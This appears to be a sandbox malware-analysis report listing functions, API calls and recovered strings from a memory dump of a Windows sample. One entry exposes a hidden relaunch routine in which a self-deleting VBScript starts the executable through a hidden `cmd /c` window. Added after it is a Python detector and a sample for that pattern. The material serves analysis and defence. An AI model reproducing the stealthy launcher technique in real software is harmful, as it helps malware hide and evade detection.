• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID:
• String ID: (dscPtr->xdMask & TM_IS_PTR) == 0$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$dscPtr->xdArgCopy == 0$dscPtr->xdERRaddr == errPtr$dscPtr->xdHtabAdr == hdtPtr$dscPtr->xdMask & TM_IS_PTR$dscPtr->xdSize == size$dscPtr->xdTypeID == dscPtr->xdBase$hdtPtr->HDcctrAddr$mask & TM_IS_PTR
• API String ID: 0-1891739981
• Opcode ID: 969f67ffcb5067673063e64fe3796bacbba4f129e949b1f3920271b5ca9efc58
• Instruction ID: b0be35119990f9db5c9be0669567bd5358c9fa87076fb98632e1a2023bb73427
• Opcode Fuzzy Hash: 969f67ffcb5067673063e64fe3796bacbba4f129e949b1f3920271b5ca9efc58
• Instruction Fuzzy Hash: 8481D471D00204BBDB14CF40CD8AB9A7FB5AF64304F1440BAED443A2D6E7BE9A54DB99
Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                                                                                                                                                          • Instruction ID: 32107e399c442d431b17f08ea8fc09fa920db9921090263b4ef1c3f31102ad3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 27B19D719003069FDB20DF68C885BAEBBF9FF48300F14406BE499A7352D775A946CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • dttPtr->dttType->tpMask & TM_IS_PTR, xrefs: 00403D5E
                                                                                                                                                                                          • varType->tpClass.tpcFlags & CF_HAS_DTOR, xrefs: 00403E67
                                                                                                                                                                                          • XX.CPP, xrefs: 00403ECC
                                                                                                                                                                                          • XX.CPP, xrefs: 00403F29
                                                                                                                                                                                          • XX.CPP, xrefs: 00403DC2
                                                                                                                                                                                          • XX.CPP, xrefs: 00403FAD
                                                                                                                                                                                          • dttPtr->dttFlags & (DTCVF_PTRVAL|DTCVF_RETVAL), xrefs: 00403D3C
                                                                                                                                                                                          • elemType->tpClass.tpcFlags & CF_HAS_DTOR, xrefs: 00403ED1
                                                                                                                                                                                          • IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR), xrefs: 00403DC7
                                                                                                                                                                                          • XX.CPP, xrefs: 00403D7E
                                                                                                                                                                                          • XX.CPP, xrefs: 00403D37
                                                                                                                                                                                          • dtCnt >= 0, xrefs: 00403FB2
                                                                                                                                                                                          • XX.CPP, xrefs: 00403D59
                                                                                                                                                                                          • varType->tpMask & TM_IS_PTR, xrefs: 00403F2E
                                                                                                                                                                                          • dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR, xrefs: 00403D83
                                                                                                                                                                                          • XX.CPP, xrefs: 00403E62
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$dtCnt >= 0$dttPtr->dttFlags & (DTCVF_PTRVAL|DTCVF_RETVAL)$dttPtr->dttType->tpMask & TM_IS_PTR$dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR$elemType->tpClass.tpcFlags & CF_HAS_DTOR$varType->tpClass.tpcFlags & CF_HAS_DTOR$varType->tpMask & TM_IS_PTR
                                                                                                                                                                                          • API String ID: 0-1768441193
                                                                                                                                                                                          • Opcode ID: 4acfe1481d98f6b053f88c73a38a3bcd134e0db91d14c5b2a59e664249bb3ef2
                                                                                                                                                                                          • Instruction ID: caf5c84f2d173a05e078e6a7eb0dc506ced428132af286e1606af20b9f92d0a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4acfe1481d98f6b053f88c73a38a3bcd134e0db91d14c5b2a59e664249bb3ef2
                                                                                                                                                                                          • Instruction Fuzzy Hash: E4D18171E002099FDB04CF54C845BAEBFB5AF44314F1885AAEA457B3D2C3799D91CB89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 14647D06
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 146490D7
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 146490E9
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 146490FB
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 1464910D
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 1464911F
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 14649131
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 14649143
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 14649155
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 14649167
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 14649179
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 1464918B
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 1464919D
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 146491AF
                                                                                                                                                                                          • _free.LIBCMT ref: 14647CFB
                                                                                                                                                                                            • Part of subcall function 1464571E: HeapFree.KERNEL32(00000000,00000000,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?), ref: 14645734
                                                                                                                                                                                            • Part of subcall function 1464571E: GetLastError.KERNEL32(?,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?,?), ref: 14645746
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D1D
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D32
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D3D
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D5F
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D72
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D80
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D8B
                                                                                                                                                                                          • _free.LIBCMT ref: 14647DC3
                                                                                                                                                                                          • _free.LIBCMT ref: 14647DCA
                                                                                                                                                                                          • _free.LIBCMT ref: 14647DE7
                                                                                                                                                                                          • _free.LIBCMT ref: 14647DFF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                          • Opcode ID: 5eefc3bfaceb53b35bf337774b3e85d6d0debe1572487c9785ef6be5db5587fb
                                                                                                                                                                                          • Instruction ID: 043c9089dcf2c8a651dbc88f00da8da6807279716be67812734449a61f3b61e0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eefc3bfaceb53b35bf337774b3e85d6d0debe1572487c9785ef6be5db5587fb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E318F31611245DFEF229B38D840B66BBE9EF2021DF39442BE949D7651DE39F880CB18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 1238130A
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 1238051F
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 12380531
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 12380543
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 12380555
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 12380567
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 12380579
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 1238058B
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 1238059D
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 123805AF
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 123805C1
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 123805D3
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 123805E5
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 123805F7
                                                                                                                                                                                          • _free.LIBCMT ref: 123812FF
                                                                                                                                                                                            • Part of subcall function 12376782: RtlFreeHeap.NTDLL(00000000,00000000,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?), ref: 12376798
                                                                                                                                                                                            • Part of subcall function 12376782: GetLastError.KERNEL32(?,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?,?), ref: 123767AA
                                                                                                                                                                                          • _free.LIBCMT ref: 12381321
                                                                                                                                                                                          • _free.LIBCMT ref: 12381336
                                                                                                                                                                                          • _free.LIBCMT ref: 12381341
                                                                                                                                                                                          • _free.LIBCMT ref: 12381363
                                                                                                                                                                                          • _free.LIBCMT ref: 12381376
                                                                                                                                                                                          • _free.LIBCMT ref: 12381384
                                                                                                                                                                                          • _free.LIBCMT ref: 1238138F
                                                                                                                                                                                          • _free.LIBCMT ref: 123813C7
                                                                                                                                                                                          • _free.LIBCMT ref: 123813CE
                                                                                                                                                                                          • _free.LIBCMT ref: 123813EB
                                                                                                                                                                                          • _free.LIBCMT ref: 12381403
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                          • Opcode ID: d1c232a5e105c50b64f1f14b8965ff2b4e2fd8ea295d90f08443632446ef1733
                                                                                                                                                                                          • Instruction ID: 2cf2ac235a0be6ecf7b707952adbdd24e0f391734ff302e52007910b133f6ca3
                                                                                                                                                                                          • Opcode Fuzzy Hash: d1c232a5e105c50b64f1f14b8965ff2b4e2fd8ea295d90f08443632446ef1733
                                                                                                                                                                                          • Instruction Fuzzy Hash: D1315B376003429FEF618E39D844BAAB7E8EF00355F508719E4A9DB550DBB4FE80AB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                                                                                          • Instruction ID: 9a7b15480de923ac119c52a58efeeffc2b49b486bc786284624e60808491fda7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                                                                                          • Instruction Fuzzy Hash: BBC144B2E40249BFDB24DBA9CC4AF9E7BF8AF48700F154155FA44FB282D6709E418B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: 34cca50c01e418f6f2dde033ad17383b0ed3adbea409df2de9947d109e0ebe25
                                                                                                                                                                                          • Instruction ID: 58ceff5e268c914a97f163e098ac4c176e75af0bc6b5fe2cdf4ff2c4dd50e379
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34cca50c01e418f6f2dde033ad17383b0ed3adbea409df2de9947d109e0ebe25
                                                                                                                                                                                          • Instruction Fuzzy Hash: DBC15477D40245AFDB60CBA8CC81FEEB7F8AF09700F144265FA45EB281D674AD419BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12342850: TerminateProcess.KERNEL32(00000000,pth_unenc,1233F8C8), ref: 12342860
                                                                                                                                                                                            • Part of subcall function 12342850: WaitForSingleObject.KERNEL32(000000FF), ref: 12342873
                                                                                                                                                                                            • Part of subcall function 123436F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,123A52F0), ref: 12343714
                                                                                                                                                                                            • Part of subcall function 123436F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 1234372D
                                                                                                                                                                                            • Part of subcall function 123436F8: RegCloseKey.KERNEL32(00000000), ref: 12343738
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1233D859
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,12396468,12396468,00000000), ref: 1233D9B8
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 1233D9C4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                          • API String ID: 1913171305-2411266221
                                                                                                                                                                                          • Opcode ID: 10edb2dda751f2d8b7ca83e798996862cf9356168f1b4c3b83e1a4e03bf38930
                                                                                                                                                                                          • Instruction ID: e3a984a3f43fc2dbd4aec69224f0ff9c392ea8e80a4dd0566f336198b43d8d4c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10edb2dda751f2d8b7ca83e798996862cf9356168f1b4c3b83e1a4e03bf38930
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41813BD101185ADBAAE764DC94DFEB779AF51302F004269E00AE3194FF247F4ACA90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
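The API and string pairing listed for this function (GetModuleFileNameW, then ShellExecuteW with the verb `open`, then ExitProcess, next to the fragments `.vbs`, `Temp`, `exepath`, `CreateObject("WScript.Shell").Run "cmd /c ""`, `""", 0` and `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)`) describes a relaunch routine: the process resolves its own path, writes a one-shot launcher script into the Temp folder, opens it and exits. The script starts the executable through `cmd /c` with window style 0 (hidden console) and then deletes itself. The following is an added Python example, not part of the Joe Sandbox report or of the sample, that checks .vbs files for that combination. The script layout it looks for is assembled from the fragments above; the target paths and file names in the constructed samples are made up.

```python
"""Flag one-shot launcher scripts: hidden `cmd /c "<exe>"` plus self-deletion.

Added example; the script shape is reconstructed from string fragments
recovered from the dump, and every path below is made up.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# VBScript is case-insensitive, so match case-insensitively. Inside a VBScript
# string literal a double quote is written as "", so `cmd /c ""<path>"""`
# yields `cmd /c "<path>"` followed by the closing quote of the literal; the
# trailing `, 0` is the intWindowStyle argument that hides the console.
RUN_HIDDEN = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c ""(?P<target>[^"]+)""",\s*0',
    re.IGNORECASE,
)
# The script removes itself once the payload has been started.
SELF_DELETE = re.compile(
    r'CreateObject\("Scripting\.FileSystemObject"\)\.DeleteFile\(Wscript\.ScriptFullName\)',
    re.IGNORECASE,
)


def analyse_vbs(text: str) -> Optional[Dict[str, str]]:
    """Return the relaunched target if both behaviours are present, else None.

    Requiring both keeps ordinary logon scripts (which often call Run with a
    hidden window) and ordinary clean-up scripts (which may delete themselves)
    from firing on their own.
    """
    run = RUN_HIDDEN.search(text)
    if run is None or SELF_DELETE.search(text) is None:
        return None
    return {"target": run.group("target")}


def _read_script(path: Path) -> str:
    """Decode a dropped script; handle both ANSI/UTF-8 and UTF-16 text."""
    data = path.read_bytes()
    if data.startswith((b"\xff\xfe", b"\xfe\xff")) or b"\x00" in data[:64]:
        return data.decode("utf-16", errors="ignore")
    return data.decode("utf-8", errors="ignore")


def scan_directory(root: Path) -> List[Dict[str, str]]:
    """Scan every *.vbs under root (typically a recovered %TEMP%) for the pattern."""
    hits: List[Dict[str, str]] = []
    for path in sorted(root.rglob("*.vbs")):
        try:
            found = analyse_vbs(_read_script(path))
        except OSError:
            continue
        if found:
            found["script"] = str(path)
            hits.append(found)
    return hits


# Constructed samples. The first follows the fragment layout from the dump with
# a made-up target path; the other two are benign look-alikes that must not fire.
LAUNCHER_SAMPLE = (
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Example\\relaunch.exe""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)
LOGON_SAMPLE = (
    'Set sh = CreateObject("WScript.Shell")\r\n'
    'sh.Run "cmd /c net use Z: \\\\fileserver\\share", 0\r\n'
)
CLEANUP_SAMPLE = (
    "' one-off clean-up task that removes itself when done\r\n"
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)


def demo() -> List[Dict[str, str]]:
    """Write the constructed samples into a scratch folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "launcher.vbs").write_text(LAUNCHER_SAMPLE)
        (root / "logon.vbs").write_text(LOGON_SAMPLE)
        (root / "cleanup.vbs").write_text(CLEANUP_SAMPLE)
        (root / "notes.txt").write_text(LAUNCHER_SAMPLE)  # wrong extension, not scanned
        return scan_directory(root)


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit['script']}: relaunches {hit['target']} then deletes itself")
```

`demo()` writes the constructed samples into a scratch folder and scans it; on a real case point `scan_directory` at the user's recovered Temp folder. Because the launcher deletes itself as soon as it has started the payload, the file is short-lived on a live host: there, process telemetry showing wscript.exe spawning cmd.exe with a `/c` argument that is nothing but a quoted executable path is the more reliable signal, and this scanner is for forensic images, quarantine folders and sandbox file drops.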

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • @__lockDebuggerData$qv.WKRRIUHD ref: 0040340C
                                                                                                                                                                                          • @__unlockDebuggerData$qv.WKRRIUHD ref: 00403465
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • !"bogus context in _ExceptionHandler()", xrefs: 00403750
                                                                                                                                                                                          • bogus context in _ExceptionHandler(), xrefs: 0040373D
                                                                                                                                                                                          • XX.CPP, xrefs: 0040374B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Data$qvDebugger$@__lock@__unlock
                                                                                                                                                                                          • String ID: !"bogus context in _ExceptionHandler()"$XX.CPP$bogus context in _ExceptionHandler()
                                                                                                                                                                                          • API String ID: 2914929783-349939845
                                                                                                                                                                                          • Opcode ID: c392f7f339af2bf3e46a4916eb2e5e7a57c82609a3993434a378f8b6525d0d29
                                                                                                                                                                                          • Instruction ID: c317ca9096495a95f9ed2eb60a2a61d46a7a471c31c3f754d609f31b13d36163
                                                                                                                                                                                          • Opcode Fuzzy Hash: c392f7f339af2bf3e46a4916eb2e5e7a57c82609a3993434a378f8b6525d0d29
                                                                                                                                                                                          • Instruction Fuzzy Hash: 55D12CB4A00209DFCB14DF99C885AADBBB5FF48304F1481BAE9057B3A1C7799E81DB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 005A1C50
                                                                                                                                                                                          • int.LIBCPMT ref: 005A1C63
                                                                                                                                                                                            • Part of subcall function 0059EEA3: std::_Lockit::_Lockit.LIBCPMT ref: 0059EEB4
                                                                                                                                                                                            • Part of subcall function 0059EEA3: std::_Lockit::~_Lockit.LIBCPMT ref: 0059EECE
                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 005A1CA3
                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 005A1CAC
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 005A1CCA
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 005A1D0B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                                                          • String ID: ,kG$0kG$@!G
                                                                                                                                                                                          • API String ID: 3815856325-312998898
                                                                                                                                                                                          • Opcode ID: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                                                                                                                                                                          • Instruction ID: ce7c1cd3a4d55f435f0ca7694a648ffc628c8ea5bf4cfcbc72b7086eeea73091
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D2107319009159FCB14FBA8D94AE9D7FA9FF86720F21016AF404E72D1DB35AE41C798
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: IS_STRUC(blType->tpMask)$IS_STRUC(blType->tpMask)$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$dtorCnt < varCount$memType$memType->tpClass.tpcFlags & CF_HAS_DTOR$varType->tpClass.tpcFlags & CF_HAS_DTOR
                                                                                                                                                                                          • API String ID: 0-1006393815
                                                                                                                                                                                          • Opcode ID: 0d642b40e8ec20ac1549495b7ae4ccacb88e5f7043fc7750c95bec1c055ba6ea
                                                                                                                                                                                          • Instruction ID: a813c007022810ed9c0a106b08cb99bfc9bf50251e45d0976e4052c3e0ccd181
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d642b40e8ec20ac1549495b7ae4ccacb88e5f7043fc7750c95bec1c055ba6ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: B781C472A00208ABDF119F91CC46FAE7FB5BF04705F14806AFD54362D1D3BA9A60DB89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • __isSameTypeID(srcTypPtr, tgtTypPtr) == 0, xrefs: 00404705
                                                                                                                                                                                          • tgtTypPtr != 0 && __isSameTypeID(topTypPtr, tgtTypPtr) == 0, xrefs: 0040474D
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 00404833
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 00404748
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 00404700
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 004046D1
                                                                                                                                                                                          • topTypPtr != 0 && IS_STRUC(topTypPtr->tpMask), xrefs: 0040468A
                                                                                                                                                                                          • srcTypPtr == 0 || IS_STRUC(srcTypPtr->tpMask), xrefs: 004046D6
